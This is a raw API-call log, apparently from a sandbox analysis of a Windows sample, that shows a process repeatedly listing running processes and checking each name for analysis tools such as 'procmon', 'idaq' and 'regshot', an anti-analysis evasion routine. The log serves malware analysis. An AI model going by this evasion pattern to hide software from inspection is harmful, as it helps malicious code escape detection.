(lpFirst="audiodg.exe", lpSrch="procmon") returned 0x0 [0056.010] Process32NextW (in: hSnapshot=0x1e0, lppe=0x9af5fc | out: lppe=0x9af5fc*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x9a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0056.011] StrStrIW (lpFirst="svchost.exe", lpSrch="procmon") returned 0x0 [0056.011] Process32NextW (in: hSnapshot=0x1e0, lppe=0x9af5fc | out: lppe=0x9af5fc*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x9e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1 [0056.011] StrStrIW (lpFirst="dllhost.exe", lpSrch="procmon") returned 0x0 [0056.011] Process32NextW (in: hSnapshot=0x1e0, lppe=0x9af5fc | out: lppe=0x9af5fc*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1 [0056.012] StrStrIW (lpFirst="dllhost.exe", lpSrch="procmon") returned 0x0 [0056.012] Process32NextW (in: hSnapshot=0x1e0, lppe=0x9af5fc | out: lppe=0x9af5fc*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x990, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x7cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="Tax Tool.exe")) returned 1 [0056.012] StrStrIW (lpFirst="Tax Tool.exe", lpSrch="procmon") returned 0x0 [0056.013] Process32NextW (in: hSnapshot=0x1e0, lppe=0x9af5fc | out: lppe=0x9af5fc*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x320, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0056.013] StrStrIW (lpFirst="taskhostw.exe", lpSrch="procmon") returned 0x0 [0056.013] Process32NextW (in: hSnapshot=0x1e0, lppe=0x9af5fc | out: lppe=0x9af5fc*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x320, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 0 [0056.014] CloseHandle (hObject=0x1e0) returned 1 [0056.014] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1e0 [0056.018] Process32FirstW (in: hSnapshot=0x1e0, lppe=0x9af600 | out: lppe=0x9af600*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0056.019] StrStrIW (lpFirst="[System Process]", lpSrch="idaq") returned 0x0 [0056.019] Process32NextW (in: hSnapshot=0x1e0, lppe=0x9af600 | out: lppe=0x9af600*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6e, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0056.033] StrStrIW (lpFirst="System", lpSrch="idaq") returned 0x0 [0056.033] Process32NextW (in: hSnapshot=0x1e0, lppe=0x9af600 | out: lppe=0x9af600*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x108, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0056.033] StrStrIW (lpFirst="smss.exe", lpSrch="idaq") returned 0x0 [0056.033] Process32NextW (in: hSnapshot=0x1e0, lppe=0x9af600 | out: lppe=0x9af600*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x150, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x148, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0056.034] StrStrIW (lpFirst="csrss.exe", lpSrch="idaq") returned 0x0 [0056.034] Process32NextW (in: hSnapshot=0x1e0, lppe=0x9af600 | out: lppe=0x9af600*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x18c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x148, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0056.035] StrStrIW (lpFirst="wininit.exe", lpSrch="idaq") returned 0x0 [0056.035] Process32NextW (in: hSnapshot=0x1e0, lppe=0x9af600 | out: lppe=0x9af600*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x194, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x184, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0056.035] StrStrIW (lpFirst="csrss.exe", lpSrch="idaq") returned 0x0 [0056.035] Process32NextW (in: hSnapshot=0x1e0, lppe=0x9af600 | out: lppe=0x9af600*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x184, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0056.036] StrStrIW (lpFirst="winlogon.exe", lpSrch="idaq") returned 0x0 [0056.036] Process32NextW (in: hSnapshot=0x1e0, lppe=0x9af600 | out: lppe=0x9af600*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x18c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0056.037] StrStrIW (lpFirst="services.exe", lpSrch="idaq") returned 0x0 [0056.037] Process32NextW (in: hSnapshot=0x1e0, lppe=0x9af600 | out: lppe=0x9af600*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x18c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0056.037] StrStrIW (lpFirst="lsass.exe", lpSrch="idaq") returned 0x0 [0056.037] Process32NextW (in: hSnapshot=0x1e0, lppe=0x9af600 | out: lppe=0x9af600*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x23c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x21, th32ParentProcessID=0x1dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0056.038] StrStrIW (lpFirst="svchost.exe", lpSrch="idaq") returned 0x0 [0056.038] Process32NextW (in: hSnapshot=0x1e0, lppe=0x9af600 | out: lppe=0x9af600*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x25c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x1dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0056.039] StrStrIW (lpFirst="svchost.exe", lpSrch="idaq") returned 0x0 [0056.039] Process32NextW (in: hSnapshot=0x1e0, lppe=0x9af600 | out: lppe=0x9af600*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x1c4, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0056.039] StrStrIW (lpFirst="dwm.exe", lpSrch="idaq") returned 0x0 [0056.039] Process32NextW (in: hSnapshot=0x1e0, lppe=0x9af600 | out: lppe=0x9af600*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x320, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x46, th32ParentProcessID=0x1dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0056.040] StrStrIW (lpFirst="svchost.exe", lpSrch="idaq") returned 0x0 [0056.041] Process32NextW (in: hSnapshot=0x1e0, lppe=0x9af600 | out: lppe=0x9af600*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x1dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0056.041] StrStrIW (lpFirst="svchost.exe", lpSrch="idaq") returned 0x0 [0056.041] Process32NextW (in: hSnapshot=0x1e0, lppe=0x9af600 | out: lppe=0x9af600*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x354, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0056.042] StrStrIW (lpFirst="svchost.exe", lpSrch="idaq") returned 0x0 [0056.042] Process32NextW (in: hSnapshot=0x1e0, lppe=0x9af600 | out: lppe=0x9af600*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x368, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0056.042] StrStrIW (lpFirst="svchost.exe", lpSrch="idaq") returned 0x0 [0056.043] Process32NextW (in: hSnapshot=0x1e0, lppe=0x9af600 | out: lppe=0x9af600*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x390, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x1dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0056.043] StrStrIW (lpFirst="svchost.exe", lpSrch="idaq") returned 0x0 [0056.043] Process32NextW (in: hSnapshot=0x1e0, lppe=0x9af600 | out: lppe=0x9af600*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x274, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1a, th32ParentProcessID=0x1dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0056.044] StrStrIW (lpFirst="svchost.exe", lpSrch="idaq") returned 0x0 [0056.044] Process32NextW (in: hSnapshot=0x1e0, lppe=0x9af600 | out: lppe=0x9af600*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0056.044] StrStrIW (lpFirst="spoolsv.exe", lpSrch="idaq") returned 0x0 [0056.044] Process32NextW (in: hSnapshot=0x1e0, lppe=0x9af600 | out: lppe=0x9af600*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x41c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x21, th32ParentProcessID=0x1dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0056.045] StrStrIW (lpFirst="svchost.exe", lpSrch="idaq") returned 0x0 [0056.045] Process32NextW (in: hSnapshot=0x1e0, lppe=0x9af600 | out: lppe=0x9af600*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x550, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x1dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0056.046] StrStrIW (lpFirst="svchost.exe", lpSrch="idaq") returned 0x0 [0056.046] Process32NextW (in: hSnapshot=0x1e0, lppe=0x9af600 | out: lppe=0x9af600*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x700, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x320, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0056.047] StrStrIW (lpFirst="sihost.exe", lpSrch="idaq") returned 0x0 [0056.047] Process32NextW (in: hSnapshot=0x1e0, lppe=0x9af600 | out: lppe=0x9af600*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x728, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x320, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0056.047] StrStrIW (lpFirst="taskhostw.exe", lpSrch="idaq") returned 0x0 [0056.047] Process32NextW (in: hSnapshot=0x1e0, lppe=0x9af600 | out: lppe=0x9af600*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x31, th32ParentProcessID=0x798, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0056.048] StrStrIW (lpFirst="explorer.exe", lpSrch="idaq") returned 0x0 [0056.048] Process32NextW (in: hSnapshot=0x1e0, lppe=0x9af600 | out: lppe=0x9af600*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0056.049] StrStrIW (lpFirst="RuntimeBroker.exe", lpSrch="idaq") returned 0x0 [0056.049] Process32NextW (in: hSnapshot=0x1e0, lppe=0x9af600 | out: lppe=0x9af600*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x910, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x26, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0056.049] StrStrIW (lpFirst="ShellExperienceHost.exe", lpSrch="idaq") returned 0x0 [0056.049] Process32NextW (in: hSnapshot=0x1e0, lppe=0x9af600 | out: lppe=0x9af600*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa10, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x20, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0056.050] StrStrIW (lpFirst="SearchUI.exe", lpSrch="idaq") returned 0x0 [0056.050] Process32NextW (in: hSnapshot=0x1e0, lppe=0x9af600 | out: lppe=0x9af600*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x590, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0056.050] StrStrIW (lpFirst="svchost.exe", lpSrch="idaq") returned 0x0 [0056.050] Process32NextW (in: hSnapshot=0x1e0, lppe=0x9af600 | out: lppe=0x9af600*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x718, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x320, pcPriClassBase=6, dwFlags=0x0, szExeFile="UsoClient.exe")) returned 1 [0056.051] StrStrIW (lpFirst="UsoClient.exe", lpSrch="idaq") returned 0x0 [0056.051] Process32NextW (in: hSnapshot=0x1e0, lppe=0x9af600 | out: lppe=0x9af600*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x9c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x320, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0056.052] StrStrIW (lpFirst="taskhostw.exe", lpSrch="idaq") returned 0x0 [0056.052] Process32NextW (in: hSnapshot=0x1e0, lppe=0x9af600 | out: lppe=0x9af600*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb34, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x320, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 1 [0056.052] StrStrIW (lpFirst="WMIADAP.exe", lpSrch="idaq") returned 0x0 [0056.052] Process32NextW (in: hSnapshot=0x1e0, lppe=0x9af600 | out: lppe=0x9af600*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0056.053] StrStrIW (lpFirst="sppsvc.exe", lpSrch="idaq") returned 0x0 [0056.053] Process32NextW (in: hSnapshot=0x1e0, lppe=0x9af600 | out: lppe=0x9af600*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x30c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x718, pcPriClassBase=6, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0056.053] StrStrIW (lpFirst="conhost.exe", lpSrch="idaq") returned 0x0 [0056.054] Process32NextW (in: hSnapshot=0x1e0, lppe=0x9af600 | out: lppe=0x9af600*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x414, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0056.054] StrStrIW (lpFirst="backgroundTaskHost.exe", lpSrch="idaq") returned 0x0 [0056.054] Process32NextW (in: hSnapshot=0x1e0, lppe=0x9af600 | out: lppe=0x9af600*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xba8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0056.055] StrStrIW (lpFirst="backgroundTaskHost.exe", lpSrch="idaq") returned 0x0 [0056.055] Process32NextW (in: hSnapshot=0x1e0, lppe=0x9af600 | out: lppe=0x9af600*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xfc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0056.055] StrStrIW (lpFirst="WmiPrvSE.exe", lpSrch="idaq") returned 0x0 [0056.055] Process32NextW (in: hSnapshot=0x1e0, lppe=0x9af600 | out: lppe=0x9af600*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1 [0056.056] StrStrIW (lpFirst="dllhost.exe", lpSrch="idaq") returned 0x0 [0056.056] Process32NextW (in: hSnapshot=0x1e0, lppe=0x9af600 | out: lppe=0x9af600*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0056.057] StrStrIW (lpFirst="audiodg.exe", lpSrch="idaq") returned 0x0 [0056.057] Process32NextW (in: hSnapshot=0x1e0, lppe=0x9af600 | out: lppe=0x9af600*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x9a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0056.058] StrStrIW (lpFirst="svchost.exe", lpSrch="idaq") returned 0x0 [0056.058] Process32NextW (in: hSnapshot=0x1e0, lppe=0x9af600 | out: lppe=0x9af600*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x9e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1 [0056.058] StrStrIW (lpFirst="dllhost.exe", lpSrch="idaq") returned 0x0 [0056.058] Process32NextW (in: hSnapshot=0x1e0, lppe=0x9af600 | out: lppe=0x9af600*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1 [0056.059] StrStrIW (lpFirst="dllhost.exe", lpSrch="idaq") returned 0x0 [0056.059] Process32NextW (in: hSnapshot=0x1e0, lppe=0x9af600 | out: lppe=0x9af600*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x990, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x7cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="Tax Tool.exe")) returned 1 [0056.059] StrStrIW (lpFirst="Tax Tool.exe", lpSrch="idaq") returned 0x0 [0056.059] Process32NextW (in: hSnapshot=0x1e0, lppe=0x9af600 | out: lppe=0x9af600*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x320, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0056.060] StrStrIW (lpFirst="taskhostw.exe", lpSrch="idaq") returned 0x0 [0056.060] Process32NextW (in: hSnapshot=0x1e0, lppe=0x9af600 | out: lppe=0x9af600*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x320, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 0 [0056.061] CloseHandle (hObject=0x1e0) returned 1 [0056.061] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1e0 [0056.065] Process32FirstW (in: hSnapshot=0x1e0, lppe=0x9af5fc | out: lppe=0x9af5fc*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0056.065] StrStrIW (lpFirst="[System Process]", lpSrch="regshot") returned 0x0 [0056.065] Process32NextW (in: hSnapshot=0x1e0, lppe=0x9af5fc | out: lppe=0x9af5fc*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6e, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0056.077] StrStrIW (lpFirst="System", lpSrch="regshot") returned 0x0 [0056.078] Process32NextW (in: hSnapshot=0x1e0, lppe=0x9af5fc | out: lppe=0x9af5fc*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x108, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0056.078] StrStrIW (lpFirst="smss.exe", lpSrch="regshot") returned 0x0 [0056.078] Process32NextW (in: hSnapshot=0x1e0, lppe=0x9af5fc | out: lppe=0x9af5fc*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x150, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x148, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0056.079] StrStrIW (lpFirst="csrss.exe", lpSrch="regshot") returned 0x0 [0056.079] Process32NextW (in: hSnapshot=0x1e0, lppe=0x9af5fc | out: lppe=0x9af5fc*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x18c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x148, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0056.079] StrStrIW (lpFirst="wininit.exe", lpSrch="regshot") returned 0x0 [0056.079] Process32NextW (in: hSnapshot=0x1e0, lppe=0x9af5fc | out: lppe=0x9af5fc*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x194, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x184, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0056.080] StrStrIW (lpFirst="csrss.exe", lpSrch="regshot") returned 0x0 [0056.080] Process32NextW (in: hSnapshot=0x1e0, lppe=0x9af5fc | out: lppe=0x9af5fc*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x184, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0056.080] StrStrIW (lpFirst="winlogon.exe", lpSrch="regshot") returned 0x0 [0056.081] Process32NextW (in: hSnapshot=0x1e0, lppe=0x9af5fc | out: lppe=0x9af5fc*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x18c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0056.081] StrStrIW (lpFirst="services.exe", lpSrch="regshot") returned 0x0 [0056.081] Process32NextW (in: hSnapshot=0x1e0, lppe=0x9af5fc | out: lppe=0x9af5fc*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x18c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0056.082] StrStrIW (lpFirst="lsass.exe", lpSrch="regshot") returned 0x0 [0056.082] Process32NextW (in: hSnapshot=0x1e0, lppe=0x9af5fc | out: lppe=0x9af5fc*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x23c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x21, th32ParentProcessID=0x1dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0056.082] StrStrIW (lpFirst="svchost.exe", lpSrch="regshot") returned 0x0 [0056.082] Process32NextW (in: hSnapshot=0x1e0, lppe=0x9af5fc | out: lppe=0x9af5fc*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x25c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x1dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0056.083] StrStrIW (lpFirst="svchost.exe", lpSrch="regshot") returned 0x0 [0056.083] Process32NextW (in: hSnapshot=0x1e0, lppe=0x9af5fc | out: lppe=0x9af5fc*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x1c4, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0056.084] StrStrIW (lpFirst="dwm.exe", lpSrch="regshot") returned 0x0 [0056.084] Process32NextW (in: hSnapshot=0x1e0, lppe=0x9af5fc | out: lppe=0x9af5fc*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x320, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x46, th32ParentProcessID=0x1dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0056.084] StrStrIW (lpFirst="svchost.exe", lpSrch="regshot") returned 0x0 [0056.084] Process32NextW (in: hSnapshot=0x1e0, lppe=0x9af5fc | out: lppe=0x9af5fc*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x1dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0056.085] StrStrIW (lpFirst="svchost.exe", lpSrch="regshot") returned 0x0 [0056.085] Process32NextW (in: hSnapshot=0x1e0, lppe=0x9af5fc | out: lppe=0x9af5fc*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x354, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0056.085] StrStrIW (lpFirst="svchost.exe", lpSrch="regshot") returned 0x0 [0056.085] Process32NextW (in: hSnapshot=0x1e0, lppe=0x9af5fc | out: lppe=0x9af5fc*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x368, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0056.086] StrStrIW (lpFirst="svchost.exe", lpSrch="regshot") returned 0x0 [0056.086] Process32NextW (in: hSnapshot=0x1e0, lppe=0x9af5fc | out: lppe=0x9af5fc*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x390, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x1dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0056.087] StrStrIW (lpFirst="svchost.exe", lpSrch="regshot") returned 0x0 